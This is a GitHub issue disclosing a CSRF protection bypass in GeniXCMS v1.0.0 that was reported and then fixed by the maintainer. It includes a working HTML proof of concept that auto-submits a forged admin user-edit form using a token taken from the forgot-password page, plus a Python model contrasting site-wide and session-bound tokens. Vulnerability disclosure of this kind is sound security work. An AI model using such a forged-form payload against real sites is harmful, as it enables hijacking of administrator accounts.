
CSRF in background management of v1.0.0(latest version) discovered by "ADLab of Venustech" #70

Closed
superfish9 opened this issue Feb 9, 2017 · 0 comments
@superfish9

GeniXCMS implements a token to defend against CSRF in the background management web pages. An attacker is able to bypass the defense as follows:
First, visit the forgotpassword.php page and grab a token, which can be used to launch a CSRF attack:
(screenshot: wx20170209-154200@2x)
Then, use the following PoC (the token used below is from another test):

<html>
<head>
<title>csrf</title>
</head>
<body>
<form id="csrf" action="http://192.168.246.151/genixcms100/gxadmin/index.php?page=users&act=edit&id=1" method="post">
<input name="edituser" value="" />
<input name="userid" value="sfishtest" />
<input name="email" value="sfish@test.com" />
<input name="pass" value="" />
<input name="group" value="0" />
<input name="token" value="S2irBryibAsjAXfhUFwktRtrbwAVoC2ofIKej8Zp5C6r9f0QBPiJ9sbdnHNOC88oT4MqfI59zv3TIRMH" />
</form>
<script>
document.getElementById("csrf").submit();
</script>
</body>
</html>

Finally, the response demonstrated that the token is valid:
(screenshot: wx20170209-154122@2x)
Thus, we bypass the defense against CSRF and are able to add an admin account to GeniXCMS.
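The root cause described above is a token that is valid site-wide rather than tied to the session and action that presented it. The following is an added defender-side model (not code from this issue or from GeniXCMS; the key, session secrets and action names are constructed) contrasting that design with one that binds the token to a per-session secret and the action, so a token minted on the anonymous forgot-password page cannot satisfy the admin users/edit check:

```python
"""Contrast of a site-wide CSRF token pool with session- and action-bound tokens."""
import hashlib
import hmac
import secrets


class GlobalTokenStore:
    """Weak design: every token the site ever issued is accepted on any request,
    so a token handed to an anonymous visitor also passes the admin check."""

    def __init__(self):
        self._valid = set()

    def issue(self) -> str:
        token = secrets.token_urlsafe(32)
        self._valid.add(token)
        return token

    def verify(self, token: str) -> bool:
        return token in self._valid


SERVER_KEY = b"constructed-demo-key-replace-per-deployment"  # assumption


def issue_bound_token(session_secret: str, action: str) -> str:
    """Hardened design: HMAC over a random per-session secret (stored server-side
    in the session, not the cookie value itself) plus the action it authorizes."""
    message = f"{session_secret}\x00{action}".encode()
    return hmac.new(SERVER_KEY, message, hashlib.sha256).hexdigest()


def verify_bound_token(session_secret: str, action: str, presented: str) -> bool:
    expected = issue_bound_token(session_secret, action)
    return hmac.compare_digest(expected, presented)  # constant-time comparison


def demo() -> dict:
    """Replay the scenario from this issue against both designs."""
    store = GlobalTokenStore()
    anon_token = store.issue()  # obtained from forgotpassword.php without logging in
    anon_secret, admin_secret = secrets.token_hex(16), secrets.token_hex(16)
    attacker_token = issue_bound_token(anon_secret, "forgotpassword")
    return {
        "global_accepts_anon_token": store.verify(anon_token),
        "bound_accepts_anon_token": verify_bound_token(admin_secret, "users/edit", attacker_token),
        "bound_accepts_wrong_action": verify_bound_token(
            admin_secret, "users/edit", issue_bound_token(admin_secret, "forgotpassword")),
        "bound_accepts_own_token": verify_bound_token(
            admin_secret, "users/edit", issue_bound_token(admin_secret, "users/edit")),
    }


if __name__ == "__main__":
    print(demo())
```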

@semplon semplon self-assigned this Feb 10, 2017
@superfish9 superfish9 changed the title CSRF in background management of v1.0.0(latest version) CSRF in background management of v1.0.0(latest version) discovered by ADLab of Venustech Feb 11, 2017
@superfish9 superfish9 changed the title CSRF in background management of v1.0.0(latest version) discovered by ADLab of Venustech CSRF in background management of v1.0.0(latest version) discovered by "ADLab of Venustech" Feb 11, 2017
semplon pushed a commit that referenced this issue Feb 12, 2017
@semplon semplon closed this as completed Feb 12, 2017
semplon pushed a commit that referenced this issue Feb 12, 2017